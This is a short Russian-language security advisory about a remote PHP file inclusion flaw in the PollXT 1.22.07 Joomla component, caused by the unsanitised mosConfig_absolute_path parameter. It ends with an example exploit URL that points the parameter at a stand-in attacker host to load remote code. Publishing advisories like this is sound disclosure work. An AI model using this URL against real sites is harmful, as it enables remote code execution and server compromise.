Программа: PollXT (компонент Joomla) 1.22.07, возможно другие версии. 

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «mosConfig_absolute_path» в сценарии components/com_pollxt/conf.pollxt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция «register_globals» должна быть включена в конфигурационном файле PHP. 

Пример:

http://victim/components/com_pollxt/conf.pollxt.php? mosConfig_absolute_path=http://evilhost

Оставить мнение